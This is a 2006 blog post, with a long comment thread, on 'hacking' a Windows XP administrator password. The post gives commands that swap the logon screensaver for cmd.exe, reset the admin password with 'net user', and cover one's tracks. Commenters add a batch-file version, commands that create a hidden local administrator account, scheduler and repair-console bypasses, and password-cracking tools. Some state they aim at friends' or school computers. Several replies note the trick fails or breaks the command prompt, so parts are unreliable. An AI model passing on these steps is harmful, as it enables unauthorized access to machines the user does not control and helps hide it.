How to Hack a Window XP Admins Password
This is a cool little computer trick for Microsoft Windows trick I’ve picked up in my travels and decided to share it with you fine and ethical individuals =). Log in and go to your DOS command prompt and enter these commands exactly:
cd\
cd\windows\system32
mkdir temphack
copy logon.scr temphack\logon.scr
copy cmd.exe temphack\cmd.exe
del logon.scr
rename cmd.exe logon.scr
exit
So what you just told windows to backup is the command program and the screen saver file. Then you edited the settings so when windows loads the screen saver, you will get an unprotected dos prompt without logging in. When this appears enter this command that’s in parenthesis (net user password). So if the admin user name is Doug and you want the password 1234 then you would enter “net user Doug 1234″ and now you’ve changed the admin password to 1234. Log in, do what you want to do, copy the contents of temphack back into system32 to cover your tracks.
Mike McCormick Says:
Does putting the two files back restore the admin’s original password? Or will the admin not be able to log in afterwards?
[Reply]
poochee reply on January 25, 2007 2:31 pm:
hi guys…pls teach how to make windows xp not to log on after a month or two months…pls
[Reply]
kaycee reply on July 3, 2008 8:46 pm:
pls send me all window xp codes
[Reply]
rman reply on July 11, 2008 3:30 pm:
dude if you want answers to any computer question you have got to check this out he has downloads/serials/computer how to’s basicly everything check it out it amazing and FREE
http://mrcomputerguy.blogspot.com
[Reply]
anom reply on March 7, 2007 7:01 pm:
watch this vid, it might solve your problems
http://www.metacafe.com/watch/376759/simple_way_on_how_to_hack_user_passwords_useful/
[Reply]
saravuth reply on July 20, 2008 6:52 pm:
please post how to hack to administrator account for window xp sp2 again . please saravuthream@yahoo.com
thank in advance
[Reply]
Joshua reply on April 18, 2007 8:50 pm:
My command prompt doesnt work anymore i keep getting an error that says windows can not find cmd. Check the name? Whats going on. I did all that above and now nothing works. Thanks.
*JoSh*
[Reply]
mike reply on November 25, 2007 10:16 am:
yo, you can go to run and type in command prompt hit enter and it should open it in a different way so that wont happen anymore
[Reply]
darkmanxxx reply on January 4, 2008 8:43 am:
man the problem is your computer may have got a virus which first destroyed the cmd.exe file.so please first try to scan your computer with either updated F-Secure or Kaspersky new version
[Reply]
anonymous reply on April 7, 2008 3:54 pm:
You can go to note pad or open windows internet explorer and right click and clikc source then when one of those is open type command.com then save the file as Anything You Want.bat then close ti and open it again for a command promt!
[Reply]
KK Raj reply on April 12, 2008 10:22 pm:
Install “avira” antivirus in ur system
[Reply]
guy reply on May 22, 2008 4:55 pm:
Open My Computer
Open Local Disk
Open Windows
Open System32
click on any file and start typing command
and then you should see it
[Reply]
Samson Gama reply on May 27, 2008 11:32 am:
Goto C: Drive
Windows
System32
And look for cmd and drag it to the desktop
[Reply]
YOU DON"T KNOW ME reply on June 2, 2008 12:33 pm:
This guy made such a fake name
[Reply]
Joshua reply on April 18, 2007 8:53 pm:
My command prompt doesnt work anymore i keep getting an error that says windows can not find cmd. Check the name? Whats going on. I did all that above and now nothing works. Thanks for the help!
*JoSh*
[Reply]
Teece reply on June 18, 2007 1:47 pm:
type “command” if “cmd” doesn’t work.
also “command.com” or “cmd.com” one of those four should work.
if it doesnt work u can email me for help
(teecehunter@yahoo.com)
[Reply]
Mechwarrior5 reply on November 7, 2007 9:00 am:
It’s because you renamed your cmd.exe to logon.scr, what you need to do is take cmd.exe and logon.scr out of the temphack folder you made and put them back into the system32 folder.
[Reply]
Duckii reply on February 12, 2008 10:16 pm:
and how do u move ur temphack folder bak to ur system32 folder?
[Reply]
Daredevil reply on September 19, 2007 11:35 pm:
Hey but that does’nt work bcoz my administrator deny the access even to change the name of the file …or delete the file
[Reply]
mano reply on October 20, 2007 5:12 am:
Does putting the two files back restore the admin’s original password? Or will the admin not be able to log in afterwards?
[Reply]
cred911 reply on October 29, 2007 2:41 am:
not working.. access denied
[Reply]
cred911 reply on October 29, 2007 2:46 am:
not working… access denied
can’t chang password.. net user administrator * 
without login as power user 
:(
[Reply]
killer reply on May 14, 2008 1:55 am:
Dear…
you can chang only guest password but not admin ..for command net user..i will try also ..but not success.ok
[Reply]
matt reply on March 20, 2008 2:52 am:
wat is DOS
[Reply]
deepak reply on June 28, 2008 12:21 am:
disk operating system…………….. buddy
[Reply]
Josie reply on July 6, 2008 11:48 am:
um. Matt its Ur Disk operating system and you can get to it by going to your start menu and clicking “Run” and enter the code. cmd
[Reply]
Ricky Gervais reply on June 28, 2008 7:05 am:
Okay somebody try their hand at this one my admin has put a software called busines lock on my PC it stops me getting to Run command and most of the programmes in My computer it is password protected how the hell do I turn it off???????
[Reply]
rman reply on July 11, 2008 3:27 pm:
ooh my god guys every one check this out any question you have this guy will answer it AND if you need a download or serial for a program he has it. im telling you guys check this out.
http://mrcomputerguy.blogspot.com
[Reply]
Posted on November 2nd, 2006 at 6:17 pm
Quinn Zerfas Says:
Yes, you are backing up theri login info, deleteing and making your own to get access. Puting the temphack files back is going to change restore the original information
[Reply]
Posted on November 2nd, 2006 at 7:20 pm
zambuka Says:
uh.. no. First of all this is old. Second of all.. the original password WILL NOT be restored. Do you honestly think password hashes are stored in the command prompt executible or the screensaver????? Come on.. if you are going to give ‘hacking’ advice.. make sure you actually know what you’re talking about. So… where did you copy this info from?
[Reply]
Posted on November 2nd, 2006 at 9:25 pm
Chris Says:
Mike, no, restoring the files won’t restore the original password. The one you just created will still be in effect.
Quinn, you are just backing up the tools used to change the password. The “net password” actually changes the password in another part of the machine that you haven’t touched yourself.
[Reply]
Posted on November 2nd, 2006 at 9:59 pm
Black Ratchet Says:
No. You’re wrong. Once you change the local admin’s password, thats all she wrote. Unless you know his/her password already (so you can change it back), once you change it, it’s gone from the system.
Also, this breach won’t work if the system has NTFS as the file system, unless you have administrative rights, you won’t be able to delete logon.scr
This post is full of holes.
If you want to learn about /real/ hacking, check out Binary Revolution.
[Reply]
Posted on November 2nd, 2006 at 10:03 pm
mhweaver Says:
No it won’t. You are replacing the screensaver (logonlscr) with a command prompt (cmd.exe). Putting the files back just puts the screensaver back the way it was, but not changing any other settings back.
The downside to this is you still need to be able to log in to move the files around :\
[Reply]
Posted on November 2nd, 2006 at 10:42 pm
Dan Kordik Says:
a slightly shorter way of doing the same thing:
cd\
cd\windows\system32
mkdir temphack
move logon.scr temphack\logon.scr
copy cmd.exe logon.scr
exit
[Reply]
fan Twen reply on February 18, 2007 9:30 am:
This do not work with XP with a domain
can not move or delete logon.scr
if you have a solution to erase the admin password of my HP portable, i would be a,lot gratefull to you
[Reply]
Posted on November 2nd, 2006 at 10:49 pm
Jim Says:
Why don’t you just delete sam that is the easiest admin password hack.
[Reply]
Posted on November 2nd, 2006 at 10:50 pm
luser Says:
logon.scr is a protected file, you need admin privs to delete it. IF you already have admin privs needed to do this, then you could just change the administrator password yourself.
So, this isn’t really a hack.
[Reply]
Posted on November 2nd, 2006 at 11:23 pm
Ivanmarsh Says:
A hack that requires you to be logged into the machine to set up the hack isn’t a hack. If you’re already logged into the machine what do you need the hack for?
[Reply]
Skeletor reply on January 20, 2008 3:55 pm:
You are logged into the machine but not with administrative privileges. That’s what you need the hack for. And a brain, while you are at it.
[Reply]
Posted on November 3rd, 2006 at 12:27 am
Mark Says:
I wrote a simpler way to do this a long time ago. If you have ANY admin access, you can just use the command to change any other user’s password without knowing it. This was all previously covered @
http://www.allthingsmarked.com/2006/08/21/change-your-xp-password-via-the-command-line/
[Reply]
Posted on November 3rd, 2006 at 12:49 am
Roman Says:
I tried on computer in A+spec class with restricted access it doesn’t work when i tried to make directory temphack it says access denied HELP
[Reply]
Posted on November 3rd, 2006 at 1:53 am
naxo Says:
try this http://ophcrack.sourceforge.net/. Works perfectly.
[Reply]
Posted on November 3rd, 2006 at 11:49 am
Anonymous NT Shaman Says:
Brilliant! You just wiped the admins’s password and he’s going to be quite cross with you!
The two files you’ve copied DO NOT contain the Admin’s password which you can’t get that way.
You’d have to use something like the NTBACKUP and have it save the registry (System State). Restoring the registry, would of course wipe your hacked account.
You’re better off doing something like this instead:
net user i0wnU SkR1ptK!ddY /add
net localgroup Administrators i0wnU /add
This won’t add you to the domain, but will add you to the local machine.
Also, you’ll find that on a properly hardened system, you will not have permissions to overwrite the screensaver.
However, if you are allowed to run the windows scheduler via the AT command, you can schedule the above net commands to do the same thing without messing about with the screen saver. (Provided the scheduler runs as the SYSTEM or an Admin)
i.e.
AT 06:06 NET USER ….
AT 06:07 NET LOCALGROUP …
And Bob’s your uncle.
Cheers!
[Reply]
Posted on November 3rd, 2006 at 11:52 am
Brian Snipes Says:
Wouldn’t you have to already have administrator privileges in order for this to work? I wouldn’t think a user that was only in the Users group would have permissions to overwrite those file on an NTFS filesystem. Perhaps the filesystem is FAT32?
[Reply]
Posted on November 3rd, 2006 at 2:04 pm
Gv Says:
Ever heard of ERD commander?…. that would be much easier if you can’t into the comp to begin with do to a lock out …
[Reply]
learning reply on August 7, 2007 2:11 pm:
Hello I see that you had offered some advice to someone back in 2006 about my loERD commander i have the software. We’ll what my problem is. I have a hard drive that i am trying to access but it is protected with a bios password. How can i get around it with the locksmith or can you tell me what script i should be looking for in command line once opened in notepad so i can change the value of 0 or 1 i don’t want to overwrite the hard drive. Any feed back would be greatly appreciated.
Thanks in advance!!!
[Reply]
Posted on November 3rd, 2006 at 5:21 pm
gordon Says:
Normal system user does not have rights to copy, move , ren files in sys32. So useless useless you have rights to the C:.
[Reply]
Posted on November 3rd, 2006 at 5:51 pm
exceed Says:
This only works in Windows 2000 and prior. Does not work in XP/2003. You must have Admin rights to modify files/folders in %SYSTEMROOT%\System32 directory in XP/2003.
Anyway, once you have physical access to machine use: http://home.eunet.no/~pnordahl/ntpasswd/bootdisk.html
[Reply]
Posted on November 3rd, 2006 at 5:59 pm
Surferbill Says:
It’s a nice idea if you stick this on a USB stick and were scouring the school/office for unlocked, unattended PCs. As mentioned there are many better ways, but certainly this line would expose you straight away:
rename cmd.exe logon.scr
In effect you’ve moved cmd.exe meaning nobody on the machine can open a command prompt. Oops.
[Reply]
Posted on November 7th, 2006 at 8:37 am
Internet Business Daily » Blog Archive What The Fark?!? (and other Digg-like sites) » Says:
[...] To give you an idea of what does well on which sites, I will use my articles as example. This article about a simple Windows XP hack that my friend wrote did amazingly well on Digg and Reddit. They happened to both hit the homepage at the same time, which resulted in my site being down for an entire day. Simple cool tricks like this tend to do well on a lot of Digg-like sites. On Fark however, it did not get approved simply because it wasn’t funny in any way. This story was another big hit. It reached the homepage of Digg to later get buried (guess Diggers don’t like stuff like this) but did extremely well on Fark generating upwards of 6000 unique clicks. [...]
Posted on November 7th, 2006 at 7:45 pm
eric Says:
Nope. This does works on Windows XP (Most of the time). Some computers deny access while others do not. Luckily, our schools computers all have DeepFreeze so all I need to do to remove traces is to restart the computer.
[Reply]
Posted on November 11th, 2006 at 1:25 am
Mike Says:
Now, to turn this into a useful function quickly (lost admin password.. mistyped admin password, admin is AWOL) you could boot a nice Linux kernal, mount NTFS, and make the quick file change(s) that would then allow you to assign a new admin password.
I’ve never attempted to do this, but am going to file it away as a quick way to clean up a bad problem. I have had to pull a file from a PC and send it somewhere to have them hack the SAM file.
[Reply]
fan Twen reply on February 18, 2007 9:48 am:
My XP-Pro is in a domain, and the Linux-life cd do not find the harddisk !
[Reply]
Posted on November 11th, 2006 at 2:28 am
Marc Says:
If you are logged in as an administrator the easiest way to change any password, including THE administrator, is simply to run ‘control userpasswords2′ (without quotes) from a command prompt, then change at will.
If I can’t even get into the beast as an administrator I use a linux bootdisk which allows me to reset any password. If there’s another way I’d be delighted to learn it here.
[Reply]
wags reply on April 19, 2008 4:46 pm:
I tried many of the above options on my XP Pro version with Novell and yours worked great. I enter the ‘control userpasswords2′ command and was able to change the administrator password. Working for a school this is great for all the donated computers we get. Thank you!
[Reply]
Posted on November 12th, 2006 at 8:11 pm
Mongo Joe Says:
Just restart the friggin machine and press f8 to log in under safe mode with networking. Then log in under the administrator whcih is usually passwordfree. Create you own username and then restart with admin privelages. Do whatever u want then restart with f8 safemode, go under administrator and delete the account u made!!!! wtf!!
or use this service– http://www.loginrecovery.com
[Reply]
fan Twen reply on February 18, 2007 9:57 am:
This do not work with XP in a domain
if you have a better solution,
i wil be grateful to here about
[Reply]
Posted on November 12th, 2006 at 10:18 pm
chad Says:
actually there is a way to do this without logging in. you could use a windows 2000 installation disk and boot into the repair console to run the commands. while it is a windows 2000 disk, you can still use it to log into an xp installation. also a repair console from a windows xp disk will ask you for the administrator password whereas a win2k disk will not.
-cheers!
[Reply]
Posted on November 13th, 2006 at 12:31 am
Nick Says:
On our school computers,we have XP, but on the accounts that we log into are not the administrator accounts, so, they’ve locked us out of the Dos/Command prompt - Since we cannot access the command prompt, how can we bypass that?
[Reply]
michael reply on June 21, 2007 2:18 pm:
you can create a batch file and have it say
” call c:\windows\system32\command”
[Reply]
the man reply on April 15, 2008 6:23 pm:
ok so this a pretty dumb question.. but the slashes r reverse and i really cant find it.. how do i tyoe that in?
[Reply]
Posted on November 13th, 2006 at 1:17 am
Nick Says:
And on a side note - Logging into safemode period - the admin’s have disabled the “add a new user” thing - so therefore, I don’t think we can create a new user.
[Reply]
Posted on November 13th, 2006 at 1:19 am
Mike Says:
This will not work on XP (SP2 at least). The SYSTEM account no longer has the required access as it once had. Microsoft closed this hole. SYSTEM runs at a user level so when you try this hack you should receive SYSTEM ERROR 5 access denied or something to that effect.
Use the bootable Linux Offline password editor to “blank” the admin password. Works everytime, doesn’t require admin access, doesn’t require you to know the local admin name and is safe to use. I’ve used it multiple times for legit reasons when we needed to access laptops and desktops where the local admin wasn’t known or the account had been locked out. Hint: if you use this tool just change the local admin password to blank and don’t try setting one.
Enjoy…
[Reply]
fan Twen reply on February 18, 2007 10:00 am:
This works not on my HP portable with XP-Pro with a domain
Linux can not find the HDD
the same occurs when i use a XP-cd to reinstall: no harddisk found
[Reply]
leox reply on March 18, 2008 10:37 pm:
the reason why ur windows xp shows hard disk not found is bcos of the coruption of ur win xp.
so first go to boot screen and then change the hard disk mode to ide enabled
[Reply]
Posted on November 13th, 2006 at 2:17 pm
Fred Says:
Any windows user worth their salt will be using NTFS and will have encrypted any security sensitive files.
Resetting the Admin password may allow access to NTFS but not encrypted files. For this the public and user keys are required.
Now a hack that allowed the Admin account password to be hacked whilst allowing permission securities to remain in place would be worth writing about!
[Reply]
Posted on November 13th, 2006 at 2:35 pm
VecZ Says:
Come on guys. You use the old ways. I use a USB flash or CD boot drive to bypass anything MS can secure. This boot drive uses its own operating system against it allowing me to write to the SAM as an unprotected file without corruption. Most newer mobo BIOS support booting from an alternate source without entering the BIOS. I can even fix bad boot records, copy any files I want, delete any files I want. So get with the program.
[Reply]
Posted on November 13th, 2006 at 4:57 pm
sunny_hacker Says:
goto run. and type cmd
command promt appears.
type, net user
then type, net user adminis name *
password change option will come
change it and u have hacked xp
[Reply]
travis reply on April 13, 2007 4:00 pm:
hae wen u do this the password option does not come up so therfore cannot change password.
my dad is the administrator and the only one with administrtive rights but he used a password that he hadnt used before that only he knew and now he cant remember it. is ther anything i can do to change his password
Thanks
[Reply]
kaycee reply on July 3, 2008 8:52 pm:
solve this problem for me pls
[Reply]
Posted on November 14th, 2006 at 6:08 am
Marc Says:
OK, so we seem to have established that we can use Linux to blank or change the Administrator password (but thereby lose access to any encrypted files owned by the Administrator, until the password is changed back to its original setting) - Or we can change the Administrator password so long as we are logged into another account with administrator privileges. How can we find out the Administrator password without resetting it or having administrator privileges?
[Reply]
Posted on November 15th, 2006 at 12:11 am
Internet Business Daily » Blog Archive How To Hack Gmail Passwords » Says:
[...] Here is another great (simple) hack from the mind behind this story . It is a very simple way for Google to send you anyones Gmail password, and it is done in 5 steps! I can’t wait for the comments on this one. Here ya go: [...]
Posted on November 17th, 2006 at 12:14 am
yid Says:
i wanna have my friend’s pass
[Reply]
Posted on November 19th, 2006 at 9:28 am
lt Says:
i want to hack a friend’s password
[Reply]
Posted on November 19th, 2006 at 9:34 am
Rich Says:
Guys we are not getting the answer, how do we hack the Local Admin password or else how do we give ourselves local admin right? Without knowing existing Admin password
[Reply]
Posted on November 19th, 2006 at 6:08 pm
FLo Says:
Thanks for the tip
[Reply]
Posted on November 22nd, 2006 at 10:33 am
mohamed Says:
i try to but when i type mkdir temphack
the answer is sub directory or file temphack already exist
what can i do now
i try to contenue but not success
[Reply]
Posted on November 24th, 2006 at 12:11 am
shin jender Says:
Thanks for the tips.
Always like a game of chess or cat and mouse
[Reply]
Posted on November 25th, 2006 at 2:22 am
J-Man Says:
ummmm how do u copy the contents of temphack back to stop u getting caught….i dont get that bit???!!!
[Reply]
Posted on November 25th, 2006 at 9:51 am
Edd-Da-Styler Says:
hi can i make a boot disk on a floppy disk and make a bat with a txt document then rename to .bat file with the command you just wrote like eg.
@echo ***********************************
@echo * Edd-Da-Styler *
@echo * Password changing *
@echo * version 1.0 *
@echo * *
@echo * *
@echo * *
@echo ***********************************
@echo.
@echo Sit back and let dos do it all…..Enjoy
@echo.
Pause
@echo.
cd\
cd\windows\system32
mkdir temphack
copy logon.scr temphack\logon.scr
copy cmd.exe temphack\cmd.exe
del logon.scr
rename cmd.exe logon.scr
@echo.
@echo The admin password is now changed…..thx ( restart your computer )
pause
exit
write back i think you mite need some adustments…
[Reply]
Posted on November 26th, 2006 at 9:18 pm
HACKSTER Says:
Hey Guys if u wanna hack in to a computer all u need is the xp disk and follow these steps:
Boot up using the xp cdand start windows setup accept the licensing agrementand. clickon repair windows (R). windows willrun the repair processand will restart when the cpmputer restarts makesure it dosnt boot from the cd. it will start loading windows. keep your eye out on the bottom left hand side ofthe screen i writting will appear saying ‘installing drivers’ when its says that u need to hold dwn shift and prss f10 as it says ‘installing drivers’ Then Bingo this is a sucerity hole. When promt type: NUSRMGR.CPL and press enter u are now able to pick a user account change the password or delete account etc togain access to computer or typewhen were promt: Control userpassword2, then select log on to windows without password if u wanted. continue with repair and there u have access to the system. this has worked for meonafriend when he forgot his user and admin password witch was windows xp professional.
[Reply]
fan Twen reply on February 18, 2007 10:10 am:
this do not work on my HP portable in a domain
i receive “setup do not found any drives, F3 to stop”
[Reply]
Posted on November 27th, 2006 at 7:17 pm
Jennifer Says:
I have a question,how do you hack system password?Like for example,dell’s system password. not the windows password,the system password. thanks
[Reply]
Posted on November 29th, 2006 at 2:01 pm
Gary Says:
I have found a awsome tool UBCD 4 WIN. It is great. It has all kinds of tools on it, password crackers, reg editors, disk wipers, network sniffers. You can even use it to browse the web on a computer without a harddrive!!!
UBCD4WIN.com
[Reply]
Posted on December 1st, 2006 at 4:03 pm
prem Says:
sir
in my school computer xp is installed and we user account, i cant reset administor password,and i tried the command prompt but i get an error message “acces is denied, when i make a folder “temphack”.is their any any i call hack or get the administrator password, and all the system in my school computer have administrator, i cant even go for safe mode network logn” you got to help.and give solution in every details steps
[Reply]
Posted on December 2nd, 2006 at 12:39 pm
prem Says:
is there any way that a user can see the administrator’s password and read it.
[Reply]
Posted on December 2nd, 2006 at 12:43 pm
macosbrain Says:
cool. i tried it and it really works. but you must be able to copy and rename the files. -> if i can copy/rename files why should i “hack” the admin account. fileaccess is mostely enough.
[Reply]
Posted on December 2nd, 2006 at 1:13 pm
Shehan Says:
Hi Guyz I need a software/reset disk 2 remove or reset my admin password.
[Reply]
Posted on December 5th, 2006 at 7:44 am
Site Traffic Rising » Internet Business Daily Says:
[...] I am finally starting to get some solid traction with my blog. I have some very solid back links, which is causing my Google rank to rise. Many people believe that digg.com and the digg effect do not actually help a sites traffic. This is not true in my case, each time one of my stories such as The Windows XP Hack (2500+ diggs) or Youtube Loses Speed (500+ diggs) hit front page, my websites link was spread across the Internet. Although it gave me a huge surge of traffic that died back down after a few days, it increased my overall traffic. This obviously helped my Google traffic. [...]
Posted on December 6th, 2006 at 7:20 am
denied Says:
as someone said here, fileaccess is enough..i dont have that, i cant write to c:\windows\system32\
at command doesnt work either, among other stuff..can someone help me out here please?
[Reply]
Posted on December 15th, 2006 at 10:21 am
ziroocool Says:
i am user
you can hack administrator by pwdump
passwords=hash
by john the ripper
bye
[Reply]
Posted on December 18th, 2006 at 11:03 am
Mohebullah Says:
hi
[Reply]
Posted on